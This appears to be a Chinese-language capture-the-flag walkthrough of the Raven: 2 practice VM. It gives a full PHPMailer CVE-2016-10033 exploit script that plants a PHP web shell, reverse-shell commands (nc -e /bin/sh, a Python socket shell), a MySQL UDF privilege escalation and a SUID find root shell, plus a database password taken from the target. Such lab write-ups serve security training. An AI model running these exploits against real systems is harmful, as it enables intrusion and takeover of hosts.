B2R Raven: 2靶机渗透
视频参考:ajest :https://www.zhihu.com/zvideo/1547357583714775040?utm_id=0
原文参考:ajest :https://www.zhihu.com/column/c_1403138803561816064
原文参考:ajest https://zhuanlan.zhihu.com/p/270343652
文章目录
- B2R Raven: 2靶机渗透
- 1 启动靶机,查看后网卡为mac为00:0C:29:C6:C5:8F
- 2 显示信息:
- 3 快速扫描主机全部信息
- 4 内核信息没有扫描到,使用nmap继续扫描
- 5 dirb扫描具体的目录,没有价值
- 6 使用xray扫描,有个敏感目录
- 7【dirsearch 】扫描敏感目录
- 8 扫描到一个敏感目录,版本:PHPMailer 5.2.16
- 9 wpscan扫描,得到用户信息
- 9.1 得到两个用户
- 10 漏洞情报
- 10.1 使用searchsploit 查找漏洞版本
- 11 渗透过程
- 根据漏洞详情根据编号,尝试后放弃,文章乱的一批
- 12 使用`msfconsole`进行漏洞利用
- 13 使用 python3 ./40974.py
- 执行成功后,返回shell脚本路径
- 14 漏洞利用使用蚁剑连接
- 15 获取反弹
- 16 MySQL UDF 提权使用
- 反弹shell中连接mysql
- 搜索mysql版本的EXP
- 重新连接mysql
- 执行下面的指令
- SUID 提权
1 启动靶机,查看后网卡为mac为00:0C:29:C6:C5:8F
00:0C:29:C6:C5:8F
-sS: 使用 SYN 扫描(也称为半开放扫描),发送 SYN 包以探测目标主机上的开放端口。
┌──(kali💋kali)-[~/Desktop/frp_0.33.0_linux_amd64]
└─$ sudo nmap -sS 192.168.225.0/24
2 显示信息:
Nmap scan report for bogon (192.168.225.213)
Host is up (0.00059s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
MAC Address: 00:0C:29:C6:C5:8F (VMware)
3 快速扫描主机全部信息
nmap -T4 -A -v 192.168.225.213
-T4: 使用 T4 扫描速度,代表比默认扫描更快的速度级别。
-A: 执行 OS识别,版本检测、脚本扫描和traceroute。
-v: 输出详细信息,使扫描输出更加详尽。
扫描结果:
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 2681c1f35e01ef93493d911eae8b3cfc (DSA)
| 2048 315801194da280a6b90d40981c97aa53 (RSA)
| 256 1f773119deb0e16dca77077684d3a9a0 (ECDSA)
|_ 256 0e8571a8a2c308699c91c03f8418dfae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35627/udp6 status
| 100024 1 51031/tcp status
| 100024 1 59614/tcp6 status
|_ 100024 1 60260/udp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
4 内核信息没有扫描到,使用nmap继续扫描
sudo nmap -Pn -A -p- -sT -sC -T4 10.4.7.151 -oN nmap.A
┌──(kali💋kali)-[~/Desktop/frp_0.33.0_linux_amd64]
└─$ sudo nmap -Pn -A -p- -sT -sC -T4 192.168.225.213 -oN nmap.A
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-13 17:29 CST
Nmap scan report for bogon (192.168.225.213)
Host is up (0.0020s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 2681c1f35e01ef93493d911eae8b3cfc (DSA)
| 2048 315801194da280a6b90d40981c97aa53 (RSA)
| 256 1f773119deb0e16dca77077684d3a9a0 (ECDSA)
|_ 256 0e8571a8a2c308699c91c03f8418dfae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35627/udp6 status
| 100024 1 51031/tcp status
| 100024 1 59614/tcp6 status
|_ 100024 1 60260/udp status
51031/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:C6:C5:8F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
5 dirb扫描具体的目录,没有价值
┌──(root💀kali)-[~]
└─# dirb http://192.168.225.213:111
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Oct 13 17:33:53 2023
URL_BASE: http://192.168.225.213:111/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.225.213:111/ ----
(!) FATAL: Too many errors connecting to host
(Possible cause: RECV ERROR)
-----------------
END_TIME: Fri Oct 13 17:33:53 2023
6 使用xray扫描,有个敏感目录
http://192.168.225.213/wordpress/wp-admin/install.php
7【dirsearch 】扫描敏感目录
dirsearch -u http://192.168.225.213/ -i 200,300-399 -e php
┌──(root💀kali)-[~]
└─# dirsearch -u http://192.168.225.213/ -i 200,300-399 -e php
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 8940
Output File: /root/.dirsearch/reports/192.168.225.213/-_23-10-13_19-18-49.txt
Error Log: /root/.dirsearch/logs/errors-23-10-13_19-18-49.log
Target: http://192.168.225.213/
[19:18:49] Starting:
[19:18:51] 200 - 18KB - /.DS_Store
[19:19:23] 200 - 9KB - /contact.php
[19:19:23] 301 - 316B - /css -> http://192.168.225.213/css/
[19:19:30] 301 - 318B - /fonts -> http://192.168.225.213/fonts/
[19:19:33] 301 - 316B - /img -> http://192.168.225.213/img/
[19:19:34] 200 - 16KB - /index.html
[19:19:36] 301 - 315B - /js -> http://192.168.225.213/js/
[19:19:36] 200 - 4KB - /js/
[19:19:41] 200 - 626B - /manual/index.html
[19:19:41] 301 - 319B - /manual -> http://192.168.225.213/manual/
[19:20:08] 200 - 5KB - /vendor/
[19:20:10] 200 - 2KB - /wordpress/wp-login.php
[19:20:10] 200 - 51KB - /wordpress/
dirsearch -u http://192.168.225.213/wordpress/ -i 200,300-399 -e php
┌──(root💀kali)-[~]
└─# dirsearch -u http://192.168.225.213/wordpress/ -i 200,300-399 -e php
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 8940
Output File: /root/.dirsearch/reports/192.168.225.213/-wordpress-_23-10-13_17-45-04.txt
Error Log: /root/.dirsearch/logs/errors-23-10-13_17-45-04.log
Target: http://192.168.225.213/wordpress/
[17:45:04] Starting:
[17:45:55] 301 - 0B - /wordpress/index.php -> http://192.168.225.213/wordpress/
[17:45:59] 200 - 19KB - /wordpress/license.txt
[17:46:16] 200 - 7KB - /wordpress/readme.html
[17:46:35] 301 - 331B - /wordpress/wp-admin -> http://192.168.225.213/wordpress/wp-admin/
[17:46:35] 301 - 333B - /wordpress/wp-content -> http://192.168.225.213/wordpress/wp-content/
[17:46:35] 200 - 0B - /wordpress/wp-content/
[17:46:35] 200 - 0B - /wordpress/wp-config.php
[17:46:36] 200 - 69B - /wordpress/wp-content/plugins/akismet/akismet.php
[17:46:36] 200 - 1KB - /wordpress/wp-admin/install.php
[17:46:36] 200 - 999B - /wordpress/wp-content/uploads/
[17:46:36] 200 - 809B - /wordpress/wp-content/upgrade/
[17:46:36] 200 - 1B - /wordpress/wp-admin/admin-ajax.php
[17:46:36] 302 - 0B - /wordpress/wp-admin/ -> http://raven.local/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.225.213%2Fwordpress%2Fwp-admin%2F&reauth=1
[17:46:36] 301 - 334B - /wordpress/wp-includes -> http://192.168.225.213/wordpress/wp-includes/
[17:46:36] 200 - 0B - /wordpress/wp-cron.php
[17:46:36] 302 - 0B - /wordpress/wp-signup.php -> http://raven.local/wordpress/wp-login.php?action=register
[17:46:36] 200 - 40KB - /wordpress/wp-includes/
[17:46:36] 200 - 2KB - /wordpress/wp-login.php
Task Completed
8 扫描到一个敏感目录,版本:PHPMailer 5.2.16
9 wpscan扫描,得到用户信息
wpscan --no-update --url http://192.168.225.213/wordpress -e u,vp,vt --plugins-detection mixed
┌──(root💀kali)-[~]
└─# wpscan --no-update --url http://192.168.225.213/wordpress -e u,vp,vt --plugins-detection mixed
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.225.213/wordpress/ [192.168.225.213]
[+] Started: Fri Oct 13 19:38:43 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.225.213/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.225.213/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.225.213/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.225.213/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.23 identified (Unknown, released on Unknown).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.225.213/wordpress/, Match: '-release.min.js?ver=4.8.23'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.225.213/wordpress/, Match: 'WordPress 4.8.23'
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:37 <====================================================================================================================> (6498 / 6498) 100.00% Time: 00:00:37
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:02 <======================================================================================================================> (624 / 624) 100.00% Time: 00:00:02
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <========================================================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] michael
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Oct 13 19:40:24 2023
[+] Requests Done: 7178
[+] Cached Requests: 5
[+] Data Sent: 2.056 MB
[+] Data Received: 1.341 MB
[+] Memory used: 310.848 MB
[+] Elapsed time: 00:01:40
9.1 得到两个用户
steven
michael
10 漏洞情报
公开漏洞情报渠道:
PHPMailer是一个用于发送电子邮件的PHP类库,其广泛应用于PHP程序中。
┌──(root💀kali)-[~]
└─# searchsploit phpmailer
查询后,目标系统PHPMailer 5.2.18 存在RCE 漏洞,编号为CVE-2016-10033。
11 渗透过程
根据漏洞详情根据编号,尝试后放弃,文章乱的一批
漏洞情报:https://vip.riskivy.com/intellList? ,查询到此漏洞,发现看不懂
12 使用msfconsole进行漏洞利用
┌──(kali💋kali)-[/root]
└─$ sudo msfconsole
[*] Starting persistent handler(s)...
msf6 > search phpmailer
msf6 > searchploit phpmailer
msf6 > searchsploit -m 40974
执行后显示具体的脚本路径,修改exploit脚本,
searchsploit m 40974 会将py文件拷贝到/root目录下,执行完有提示
cd /usr/share/exploitdb/exploits/php/webapps/40974.py
13 使用 python3 ./40974.py
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
#target = 'http://192.168.225.213'
#backdoor = '/backdoor.php'
target ='http://192.168.225.213'
vuln ="/contact.php"
backdoor = '/shell.php'
#payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
payload = '<?php @eval($_REQUEST[777]);phpinfo();?>'
fields={'action': 'submit',
'name': payload,
# 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/html/shell.php server\" @protonmail.com',
'message': 'Pwned'}
m = MultipartEncoder(fields=fields,
boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Content-Type': m.content_type}
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target+vuln, data=m.to_string(),
headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
print('[+] ExPLoITeD ' + target)
执行成功后,返回shell脚本路径
14 漏洞利用使用蚁剑连接
15 获取反弹
nc -lvvp 8888 # kali的是192.168.225.166
nc -e /bin/sh 192.168.225.166 8888 # 使用蚁剑shell中输入
python -c "import pty;pty.spawn('/bin/bash')" #kali中输入,优化反弹shell
16 MySQL UDF 提权使用
"ps aux | grep mysqld" 是一个常用的 Linux 命令行命令组合,用于查找正在运行的与 "mysqld" 关键词相关的 MySQL 服务器进程。
具体解释如下:
- "ps" 命令用于查看系统中当前运行的进程。
- "aux" 是 ps 命令的选项,它指定显示所有用户的所有进程。
- "|" 是管道操作符,将前一个命令的输出传递给下一个命令作为输入。
- "grep" 命令用于在文本中搜索指定的关键词,并将包含该关键词的行进行筛选。
- "mysqld" 是 MySQL 服务器的守护进程名称。
蚁剑连接时没有发现/wordpress/wp-config.php ,使用dirsearch 扫描到目录
使用浏览器访问是空白
使用find查找此文件find -name "wp-config.php"
cat 查看配置文件,得到数据库用户名密码,账密:root:R@v3nSecurity
反弹shell中连接mysql
注意:蚁剑的shell中输入连接mysql是没有响应的
mysql -uroot -pR@v3nSecurity
获取到mysql的版本号5.5.30, 退出mysql输入exit;
搜索mysql版本的EXP
searchsploit mysql udf
searchsploit -m 1518
gcc -g -c 1518.c # 执行这句就可
gcc -g -shared -o 1518.so 1518.o -lc # 这条是软连接
将1518.so 文件上传到靶机的/tmp 目录下。
gcc -g -c 1518.c 解义
- "gcc" 是 GNU 编译器套件(GCC)中的 C 编译器,用于编译和链接 C 语言程序。
- "-g" 是 gcc 的编译选项之一,表示在编译过程中生成调试信息,以便在调试程序时进行源代码级的调试。
- "-c" 是 gcc 的编译选项之一,表示只执行编译步骤,而不进行链接。这将只生成目标文件,而不是可执行文件。
- "1518.c" 是要编译的 C 语言源代码文件的名称。
gcc -g -shared -o 1518.so 1518.o -lc
这条指令是用于将一个名为 "1518.o" 的目标文件与标准 C 库(libc)进行链接,并生成一个名为 "1518.so" 的共享库文件。具体解释如下:
- "gcc" 是 GNU 编译器套件(GCC)中的 C 编译器,用于编译和链接 C 语言程序。
- "-g" 是 gcc 的编译选项之一,表示在编译过程中生成调试信息,以便在调试程序时进行源代码级的调试。
- "-shared" 是 gcc 的选项之一,用于指定生成一个共享库文件。
- "-o 1518.so" 是 gcc 的选项之一,用于指定生成的共享库文件的名称为 "1518.so"。
- "1518.o" 是要进行链接的目标文件的名称。
- "-lc" 是 gcc 的选项之一,用于指定需要链接 libc(标准 C 库)。
python3 -m http.server 80
wget 192.168.225.166/1518.so # 进行下载,不能有空格,加空格默认下载到
kali开启服务
shell连接下载c编译好的文件
执行未有提权成功
chmod 777 exp # 777 是最高权限
gcc -c 1518.C -o 1518exp # 对c文件进行编译
chmod 777 1518exp
./1518exp
重新连接mysql
mysql -uroot -pR@v3nSecurity
执行下面的指令
create database testyl;
use testyl;
create table testyl(line blob);
insert into testyl values(load_file('/tmp/1518.so'));
select * from testyl into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function do_system returns integer soname 'udf.so';
select do_system('chmod u+s /usr/bin/find');
此时,/usr/bin/find 就具备了SUID 权限。
SUID 提权
ls -alh /usr/bin/find
mkdir testyl
find testyl -exec '/bin/sh' \;
